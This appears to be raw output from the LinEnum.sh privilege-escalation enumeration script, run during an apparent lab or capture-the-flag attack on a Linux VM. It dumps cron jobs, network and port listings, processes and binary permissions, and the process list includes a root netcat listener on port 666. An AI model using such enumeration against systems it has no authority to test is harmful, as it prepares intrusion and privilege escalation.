SSH_CONNECTION=192.168.1.9 50852 192.168.1.28 22
LESSOPEN=| /usr/bin/lesspipe %s
XDG_RUNTIME_DIR=/run/user/1026
LESSCLOSE=/usr/bin/lesspipe %s %s
_=/usr/bin/env


[[-] Path information:
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin


[[-] Available shells:
# /etc/shells: valid login shells
/bin/sh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/tmux
/usr/bin/screen
/bin/zsh
/usr/bin/zsh


[[-] Current umask value:
0002
u=rwx,g=rwx,o=rx


[[-] umask value as specified in /etc/login.defs:
UMASK		022


[[-] Password and storage information:
PASS_MAX_DAYS	99999
PASS_MIN_DAYS	0
PASS_WARN_AGE	7
ENCRYPT_METHOD SHA512


### JOBS/TASKS ##########################################
[[-] Cron jobs:
-rw-r--r-- 1 root root  722 Apr  5  2016 /etc/crontab

/etc/cron.d:
total 32
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rw-r--r--   1 root root    56 Jun  3  2016 logrotate
-rw-r--r--   1 root root   589 Jul 16  2014 mdadm
-rw-r--r--   1 root root   670 Mar  1  2016 php
-rw-r--r--   1 root root   102 Jun  3  2016 .placeholder

/etc/cron.daily:
total 56
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rwxr-xr-x   1 root root   539 Apr  5  2016 apache2
-rwxr-xr-x   1 root root   376 Mar 31  2016 apport
-rwxr-xr-x   1 root root   920 Apr  5  2016 apt-compat
-rwxr-xr-x   1 root root  1597 Nov 26  2015 dpkg
-rwxr-xr-x   1 root root   372 May  6  2015 logrotate
-rwxr-xr-x   1 root root   539 Jul 16  2014 mdadm
-rwxr-xr-x   1 root root   249 Nov 12  2015 passwd
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   383 Mar  8  2016 samba
-rwxr-xr-x   1 root root   214 Apr 12  2016 update-notifier-common

/etc/cron.hourly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

/etc/cron.monthly:
total 20
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder

/etc/cron.weekly:
total 28
drwxr-xr-x   2 root root  4096 Jun  3  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rwxr-xr-x   1 root root    86 Apr 13  2016 fstrim
-rw-r--r--   1 root root   102 Apr  5  2016 .placeholder
-rwxr-xr-x   1 root root   211 Apr 12  2016 update-notifier-common


[[-] Crontab contents:
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user	command
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#


### NETWORKING  ##########################################
[[-] Network and IP info:
enp0s3    Link encap:Ethernet  HWaddr 08:00:27:72:14:43  
          inet addr:192.168.1.28  Bcast:192.168.1.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:1490240 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1228977 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:174994153 (174.9 MB)  TX bytes:471475717 (471.4 MB)
          Interrupt:10 Base address:0xd000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:65536  Metric:1
          RX packets:1185 errors:0 dropped:0 overruns:0 frame:0
          TX packets:1185 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1 
          RX bytes:233454 (233.4 KB)  TX bytes:233454 (233.4 KB)


[[-] ARP history:
? (192.168.1.9) at 08:00:27:ca:e8:b7 [ether] on enp0s3
? (192.168.1.254) at 68:a3:78:8b:0c:dd [ether] on enp0s3


[[-] Nameserver(s):
nameserver 192.168.1.254


[[-] Default route:
default         192.168.1.254   0.0.0.0         UG    0      0        0 enp0s3


[[-] Listening TCP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:3306            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:139             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:21              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:53              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:666             0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:445             0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.1.28:22         192.168.1.9:50852       ESTABLISHED -               
tcp6       0      0 :::139                  :::*                    LISTEN      -               
tcp6       0      0 :::53                   :::*                    LISTEN      -               
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::12380                :::*                    LISTEN      -               
tcp6       0      0 :::12380                :::*                    LISTEN      -               
tcp6       0      0 :::12380                :::*                    LISTEN      -               
tcp6       0      0 :::445                  :::*                    LISTEN      -               


[[-] Listening UDP:
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
udp        0      0 192.168.1.255:137       0.0.0.0:*                           -               
udp        0      0 192.168.1.28:137        0.0.0.0:*                           -               
udp        0      0 0.0.0.0:137             0.0.0.0:*                           -               
udp        0      0 192.168.1.255:138       0.0.0.0:*                           -               
udp        0      0 192.168.1.28:138        0.0.0.0:*                           -               
udp        0      0 0.0.0.0:138             0.0.0.0:*                           -               
udp        0      0 0.0.0.0:53              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:68              0.0.0.0:*                           -               
udp        0      0 0.0.0.0:69              0.0.0.0:*                           -               
udp6       0      0 :::53                   :::*                                -               


### SERVICES #############################################
[[-] Running processes:
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.5   6760  5212 ?        Ss   17:30   0:02 /sbin/init
root         2  0.0  0.0      0     0 ?        S    17:30   0:00 [kthreadd]
root         3  0.0  0.0      0     0 ?        S    17:30   0:04 [ksoftirqd/0]
root         5  0.0  0.0      0     0 ?        S<   17:30   0:00 [kworker/0:0H]
root         7  0.0  0.0      0     0 ?        S    17:30   0:03 [rcu_sched]
root         8  0.0  0.0      0     0 ?        S    17:30   0:00 [rcu_bh]
root         9  0.0  0.0      0     0 ?        S    17:30   0:00 [migration/0]
root        10  0.0  0.0      0     0 ?        S    17:30   0:00 [watchdog/0]
root        11  0.0  0.0      0     0 ?        S    17:30   0:00 [kdevtmpfs]
root        12  0.0  0.0      0     0 ?        S<   17:30   0:00 [netns]
root        13  0.0  0.0      0     0 ?        S<   17:30   0:00 [perf]
root        14  0.0  0.0      0     0 ?        S    17:30   0:00 [khungtaskd]
root        15  0.0  0.0      0     0 ?        S<   17:30   0:00 [writeback]
root        16  0.0  0.0      0     0 ?        SN   17:30   0:00 [ksmd]
root        17  0.0  0.0      0     0 ?        SN   17:30   0:00 [khugepaged]
root        18  0.0  0.0      0     0 ?        S<   17:30   0:00 [crypto]
root        19  0.0  0.0      0     0 ?        S<   17:30   0:00 [kintegrityd]
root        20  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        21  0.0  0.0      0     0 ?        S<   17:30   0:00 [kblockd]
root        22  0.0  0.0      0     0 ?        S<   17:30   0:00 [ata_sff]
root        23  0.0  0.0      0     0 ?        S<   17:30   0:00 [md]
root        24  0.0  0.0      0     0 ?        S<   17:30   0:00 [devfreq_wq]
root        26  0.0  0.0      0     0 ?        S    17:30   0:00 [kworker/0:1]
root        28  0.0  0.0      0     0 ?        S    17:30   0:00 [kswapd0]
root        29  0.0  0.0      0     0 ?        S<   17:30   0:00 [vmstat]
root        30  0.0  0.0      0     0 ?        S    17:30   0:00 [fsnotify_mark]
root        31  0.0  0.0      0     0 ?        S    17:30   0:00 [ecryptfs-kthrea]
root        46  0.0  0.0      0     0 ?        S<   17:30   0:00 [kthrotld]
root        47  0.0  0.0      0     0 ?        S<   17:30   0:00 [acpi_thermal_pm]
root        49  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        50  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        51  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        52  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        53  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        54  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        55  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        56  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        57  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        58  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        59  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        60  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        61  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        62  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        63  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        64  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        65  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        66  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        67  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        68  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        69  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        70  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        71  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        72  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root        73  0.0  0.0      0     0 ?        S<   17:30   0:00 [ipv6_addrconf]
root        86  0.0  0.0      0     0 ?        S<   17:30   0:00 [deferwq]
root        87  0.0  0.0      0     0 ?        S<   17:30   0:00 [charger_manager]
root       135  0.0  0.0      0     0 ?        S<   17:30   0:00 [kpsmoused]
root       164  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_0]
root       166  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_0]
root       170  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_1]
root       172  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_1]
root       173  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_2]
root       176  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_2]
root       177  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_3]
root       179  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_3]
root       181  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_4]
root       182  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_4]
root       183  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_5]
root       184  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_5]
root       185  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_6]
root       186  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_6]
root       187  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_7]
root       188  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_7]
root       189  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_8]
root       190  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_8]
root       191  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_9]
root       192  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_9]
root       193  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_10]
root       194  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_10]
root       195  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_11]
root       196  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_11]
root       197  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_12]
root       198  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_12]
root       199  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_13]
root       200  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_13]
root       201  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_14]
root       202  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_14]
root       203  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_15]
root       204  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_15]
root       205  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_16]
root       206  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_16]
root       207  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_17]
root       208  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_17]
root       209  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_18]
root       210  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_18]
root       211  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_19]
root       212  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_19]
root       213  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_20]
root       214  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_20]
root       215  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_21]
root       216  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_21]
root       217  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_22]
root       218  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_22]
root       219  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_23]
root       220  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_23]
root       221  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_24]
root       222  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_24]
root       223  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_25]
root       224  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_25]
root       225  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_26]
root       226  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_26]
root       227  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_27]
root       228  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_27]
root       229  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_28]
root       230  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_28]
root       231  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_29]
root       232  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_29]
root       243  0.0  0.0      0     0 ?        S<   17:30   0:00 [mpt_poll_0]
root       245  0.0  0.0      0     0 ?        S<   17:30   0:00 [mpt/0]
root       264  0.0  0.0      0     0 ?        S    17:30   0:00 [scsi_eh_30]
root       265  0.0  0.0      0     0 ?        S<   17:30   0:00 [scsi_tmf_30]
root       266  0.0  0.0      0     0 ?        S<   17:30   0:00 [bioset]
root       372  0.0  0.0      0     0 ?        S<   17:31   0:00 [raid5wq]
root       406  0.0  0.0      0     0 ?        S<   17:31   0:00 [bioset]
root       434  0.0  0.0      0     0 ?        S<   17:31   0:00 [kworker/0:1H]
root       436  0.0  0.0      0     0 ?        S    17:31   0:00 [jbd2/sda1-8]
root       437  0.0  0.0      0     0 ?        S<   17:31   0:00 [ext4-rsv-conver]
root       488  0.0  0.0      0     0 ?        S<   17:31   0:00 [iscsi_eh]
root       492  0.0  0.2   5748  2720 ?        Ss   17:31   0:02 /lib/systemd/systemd-journald
root       501  0.0  0.0      0     0 ?        S    17:31   0:00 [kauditd]
root       503  0.0  0.0      0     0 ?        S<   17:31   0:00 [ib_addr]
root       504  0.0  0.0      0     0 ?        S<   17:31   0:00 [ib_mcast]
root       505  0.0  0.0      0     0 ?        S<   17:31   0:00 [ib_nl_sa_wq]
root       506  0.0  0.1  13284  1344 ?        Ss   17:31   0:00 /sbin/lvmetad -f
root       507  0.0  0.0      0     0 ?        S<   17:31   0:00 [ib_cm]
root       525  0.0  0.0      0     0 ?        S<   17:31   0:00 [iw_cm_wq]
root       527  0.0  0.0      0     0 ?        S<   17:31   0:00 [rdma_cm]
root       535  0.0  0.3  13852  3504 ?        Ss   17:31   0:01 /lib/systemd/systemd-udevd
root       558  0.0  0.0      0     0 ?        S<   17:31   0:00 [iprt-VBoxWQueue]
root       621  0.0  0.1   2244  1252 ?        Ss   17:31   0:00 /usr/sbin/acpid
root       623  0.0  0.2   5576  2584 ?        Ss   17:31   0:00 /usr/sbin/cron -f
daemon     624  0.0  0.1   3480  1920 ?        Ss   17:31   0:00 /usr/sbin/atd -f
message+   633  0.0  0.3   6040  3580 ?        Ss   17:31   0:00 /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation
syslog     654  0.0  0.2  30728  2992 ?        Ssl  17:31   0:00 /usr/sbin/rsyslogd -n
root       655  0.0  0.2   4144  2780 ?        Ss   17:31   0:00 /lib/systemd/systemd-logind
root       657  0.0  0.2 104668  2664 ?        Ssl  17:31   0:02 /usr/bin/lxcfs /var/lib/lxcfs/
root       696  0.0  0.0   3132   128 ?        Ss   17:31   0:00 /sbin/mdadm --monitor --pid-file /run/mdadm/monitor.pid --daemonise --scan --syslog
dnsmasq    718  0.0  0.2   9116  2564 ?        S    17:31   0:00 /usr/sbin/dnsmasq -x /var/run/dnsmasq/dnsmasq.pid -u dnsmasq -7 /etc/dnsmasq.d,.dpkg-dist,.dpkg-old,.dpkg-new --local-service --trust-anchor=.,19036,8,2,49AAC11D7B6F6446702E54A1607371607A1A41855200FD2CE1CDDE32F24E8FB5
root       941  0.0  0.5  10104  5348 ?        Ss   17:31   0:00 /usr/sbin/sshd -D
root       968  0.0  0.3   5308  3132 ?        Ss   17:31   0:00 /usr/sbin/vsftpd /etc/vsftpd.conf
root       987  0.0  0.0   2984   116 ?        Ss   17:31   0:00 /sbin/iscsid
root       988  0.0  0.2   3444  2720 ?        S<Ls 17:31   0:02 /sbin/iscsid
mysql      993  0.1 41.1 1236640 421476 ?      Ssl  17:31   0:29 /usr/sbin/mysqld
nobody    1105  0.0  0.1   3176  1580 ?        Ss   17:31   0:00 /usr/sbin/atftpd --daemon --tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /home/www
root      1107  0.0  0.1   2540  1652 ?        S    17:31   0:00 /usr/sbin/inetutils-inetd
root      1125  0.0  2.2 127044 23496 ?        Ss   17:31   0:00 php-fpm: master process (/etc/php/7.0/fpm/php-fpm.conf)
www-data  1151  0.0  0.5 127044  6128 ?        S    17:31   0:00 php-fpm: pool www
www-data  1152  0.0  0.5 127044  6128 ?        S    17:31   0:00 php-fpm: pool www
root      1180  0.0  0.5  26228  5232 ?        Ss   17:31   0:00 /usr/sbin/nmbd -D
root      1199  0.0  2.4 127368 25576 ?        Ss   17:31   0:01 /usr/sbin/apache2 -k start
root      1244  0.0  0.0   6008   608 ?        Ss   17:31   0:00 dhclient enp0s3
root      1258  0.0  1.0  42308 10644 ?        Ss   17:31   0:00 /usr/sbin/smbd -D
root      1259  0.0  0.4  40464  4180 ?        S    17:31   0:00 /usr/sbin/smbd -D
root      1261  0.0  0.4  42308  4928 ?        S    17:31   0:00 /usr/sbin/smbd -D
root      1393  0.0  0.2   5720  2728 ?        S    17:31   0:00 /bin/bash /root/python.sh
root      1395  0.0  0.2   5724  2948 ?        S    17:31   0:00 /bin/bash /usr/local/src/nc.sh
root      1397  0.0  0.3   6472  3276 ?        S    17:31   0:00 su -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null www
root      1407  0.0  0.1   4748  1360 tty1     Ss+  17:31   0:00 /sbin/agetty --noclear tty1 linux
root      1408  0.0  0.3   6472  3244 ?        S    17:31   0:00 su -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null JKanode
www       1409  0.0  0.3   6372  3964 ?        Ss   17:31   0:00 /lib/systemd/systemd --user
www       1411  0.0  0.1   7724  1468 ?        S    17:31   0:00 (sd-pam)
JKanode   1418  0.0  0.4   6372  4180 ?        Ss   17:31   0:00 /lib/systemd/systemd --user
JKanode   1420  0.0  0.1   7724  1468 ?        S    17:31   0:00 (sd-pam)
www       1426  0.0  0.0   5432   652 ?        Ss   17:31   0:00 bash -c authbind php -S 0.0.0.0:80 -t /home/www/ &>/dev/null
www       1427  0.0  2.1 126132 22320 ?        S    17:31   0:06 php -S 0.0.0.0:80 -t /home/www/
JKanode   1428  0.0  0.0   5436   652 ?        Ss   17:31   0:00 bash -c cd /home/JKanode; python2 -m SimpleHTTPServer 8888 &>/dev/null
JKanode   1430  0.0  0.8  14696  8212 ?        S    17:31   0:02 python2 -m SimpleHTTPServer 8888
root      1432  0.0  0.2  34088  3044 ?        Ss   17:31   0:00 /usr/lib/postfix/sbin/master
postfix   1439  0.0  0.3  34268  3108 ?        S    17:31   0:00 qmgr -l -t unix -u
root      4038  0.0  0.0   2692   692 ?        S    19:24   0:00 nc -nlvp 666
root      8190  0.0  0.0      0     0 ?        S    19:48   0:01 [kworker/u2:2]
postfix  11772  0.0  0.3  34116  4080 ?        S    20:49   0:00 pickup -l -t unix -u -c
root     12795  0.0  0.0      0     0 ?        S    21:54   0:00 [kworker/u2:1]
root     12824  0.0  0.8  38260  8924 ?        Ssl  21:56   0:00 /usr/lib/policykit-1/polkitd --no-debug
root     12826  0.0  0.0      0     0 ?        S    21:56   0:00 [kworker/0:0]
root     12874  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/0:3]
root     12877  0.0  0.0      0     0 ?        S    22:00   0:00 [kworker/0:4]
www-data 12879  0.0  0.6 127400  7144 ?        S    22:00   0:00 /usr/sbin/apache2 -k start
www-data 12888  0.0  0.6 127400  7144 ?        S    22:02   0:00 /usr/sbin/apache2 -k start
www-data 12889  0.0  0.6 127400  7144 ?        S    22:02   0:00 /usr/sbin/apache2 -k start
www-data 12890  0.0  0.6 127400  7144 ?        S    22:02   0:00 /usr/sbin/apache2 -k start
root     12919  0.0  0.0      0     0 ?        S    22:04   0:00 [kworker/0:5]
www-data 12921  0.0  0.6 127400  7144 ?        S    22:04   0:00 /usr/sbin/apache2 -k start
root     12979  0.0  0.0      0     0 ?        S    22:05   0:00 [kworker/u2:0]
root     13094  0.1  0.6  13484  6560 ?        Ss   22:09   0:00 sshd: zoe [priv]
zoe      13097  0.0  0.4   6372  4368 ?        Ss   22:09   0:00 /lib/systemd/systemd --user
zoe      13099  0.0  0.1   7724  1472 ?        S    22:09   0:00 (sd-pam)
zoe      13108  0.0  0.3  13484  3260 ?        S    22:09   0:00 sshd: zoe@pts/0
zoe      13109  0.0  0.3   5860  3344 pts/0    Ss   22:09   0:00 -bash
zoe      13127  0.0  0.3   6204  3480 pts/0    S+   22:09   0:00 /bin/bash ./LinEnum.sh -t
zoe      13128  0.1  0.3   6392  3220 pts/0    S+   22:09   0:00 /bin/bash ./LinEnum.sh -t
zoe      13129  0.0  0.0   4296   588 pts/0    S+   22:09   0:00 tee -a
postfix  13242  0.0  0.3  34224  3852 ?        S    22:10   0:00 cleanup -z -t unix -u -c
postfix  13243  0.0  0.4  34128  4116 ?        S    22:10   0:00 trivial-rewrite -n rewrite -t unix -u -c
postfix  13244  0.0  0.5  34160  5128 ?        S    22:10   0:00 local -t unix
zoe      13854  0.0  0.2   6392  2688 pts/0    S+   22:10   0:00 /bin/bash ./LinEnum.sh -t
zoe      13855  0.0  0.3   7760  3244 pts/0    R+   22:10   0:00 ps aux


[[-] Process binaries and associated permissions (from above list):
1.1M -rwxr-xr-x 1 root root 1.1M Sep  1  2015 /bin/bash
1.5M -rwxr-xr-x 1 root root 1.5M Apr 12  2016 /lib/systemd/systemd
344K -rwxr-xr-x 1 root root 342K Apr 12  2016 /lib/systemd/systemd-journald
628K -rwxr-xr-x 1 root root 627K Apr 12  2016 /lib/systemd/systemd-logind
440K -rwxr-xr-x 1 root root 438K Apr 12  2016 /lib/systemd/systemd-udevd
 40K -rwxr-xr-x 1 root root  38K Apr 13  2016 /sbin/agetty
   0 lrwxrwxrwx 1 root root   20 Jun  3  2016 /sbin/init -> /lib/systemd/systemd
712K -rwxr-xr-x 1 root root 711K Apr 15  2016 /sbin/iscsid
 56K -rwxr-xr-x 1 root root  54K Apr 16  2016 /sbin/lvmetad
588K -rwxr-xr-x 1 root root 585K Apr 11  2016 /sbin/mdadm
256K -rwxr-xr-x 1 root root 254K Apr  1  2016 /usr/bin/dbus-daemon
 20K -rwxr-xr-x 1 root root  18K Apr  4  2016 /usr/bin/lxcfs
 12K -rwxr-xr-x 1 root root 9.8K Jan 17  2016 /usr/lib/policykit-1/polkitd
 40K -rwxr-xr-x 1 root root  38K Apr 13  2016 /usr/lib/postfix/sbin/master
 52K -rwxr-xr-x 1 root root  50K Apr  8  2016 /usr/sbin/acpid
616K -rwxr-xr-x 1 root root 616K Apr 15  2016 /usr/sbin/apache2
 24K -rwxr-xr-x 1 root root  22K Jan 14  2016 /usr/sbin/atd
 80K -rwxr-xr-x 1 root root  78K Jul 24  2015 /usr/sbin/atftpd
 44K -rwxr-xr-x 1 root root  43K Apr  5  2016 /usr/sbin/cron
400K -rwxr-xr-x 1 root root 397K Jul 30  2015 /usr/sbin/dnsmasq
 72K -rwxr-xr-x 1 root root  71K Feb  6  2016 /usr/sbin/inetutils-inetd
 24M -rwxr-xr-x 1 root root  24M Apr 21  2016 /usr/sbin/mysqld
268K -rwxr-xr-x 1 root root 266K May 20  2016 /usr/sbin/nmbd
656K -rwxr-xr-x 1 root root 655K Apr  5  2016 /usr/sbin/rsyslogd
 72K -rwxr-xr-x 1 root root  70K May 20  2016 /usr/sbin/smbd
944K -rwxr-xr-x 1 root root 943K Apr 16  2016 /usr/sbin/sshd
200K -rwxr-xr-x 1 root root 199K Apr 13  2016 /usr/sbin/vsftpd


[[-] Contents of /etc/inetd.conf:
# /etc/inetd.conf:  see inetd(8) for further informations.
#
# Internet superserver configuration database
#
#
# Lines starting with "#:LABEL:" or "#<off>#" should not
# be changed unless you know what you are doing!
#
# If you want to disable an entry so it isn't touched during
# package updates just comment it out with a single '#' character.
#
# Packages should modify this file by using update-inetd(8)
#
# <service_name> <sock_type> <proto> <flags> <user> <server_path> <args>
#
#:INTERNAL: Internal services
#discard		stream	tcp	nowait	root	internal
#discard		dgram	udp	wait	root	internal
#daytime		stream	tcp	nowait	root	internal
#time		stream	tcp	nowait	root	internal

#:STANDARD: These are standard services.

#:BSD: Shell, login, exec and talk are BSD protocols.

#:MAIL: Mail, news and uucp services.

#:INFO: Info services

#:BOOT: TFTP service is provided primarily for booting.  Most sites
#       run this only on machines acting as "boot servers."
tftp		dgram	udp	wait	nobody /usr/sbin/tcpd /usr/sbin/in.tftpd --tftpd-timeout 300 --retry-timeout 5 --mcast-port 1758 --mcast-addr 239.239.239.0-255 --mcast-ttl 1 --maxthread 100 --verbose=5 /srv/tftp

#:RPC: RPC based services

#:HAM-RADIO: amateur-radio services

#:OTHER: Other services


[[-] The related inetd binary permissions:
lrwxrwxrwx 1 root root 6 Jul 24  2015 /usr/sbin/in.tftpd -> atftpd


[[-] /etc/init.d/ binary permissions:
total 372
drwxr-xr-x   2 root root  4096 Jun  6  2016 .
drwxr-xr-x 100 root root 12288 Jul 22 17:31 ..
-rwxr-xr-x   1 root root  2243 Feb  9  2016 acpid
-rwxr-xr-x   1 root root  8087 Apr  5  2016 apache2
-rwxr-xr-x   1 root root  2210 Apr  5  2016 apache-htcacheclean
-rwxr-xr-x   1 root root  6112 Feb 16  2016 apparmor
-rwxr-xr-x   1 root root  2799 Mar 31  2016 apport
-rwxr-xr-x   1 root root  1071 Dec  6  2015 atd
-rwxr-xr-x   1 root root  1614 Jul 24  2015 atftpd
-rwxr-xr-x   1 root root  1275 Jan 19  2016 bootmisc.sh
-rwxr-xr-x   1 root root  3807 Jan 19  2016 checkfs.sh
-rwxr-xr-x   1 root root  1098 Jan 19  2016 checkroot-bootclean.sh
-rwxr-xr-x   1 root root  9353 Jan 19  2016 checkroot.sh
-rwxr-xr-x   1 root root  1343 Apr  4  2016 console-setup
-rwxr-xr-x   1 root root  3049 Apr  5  2016 cron
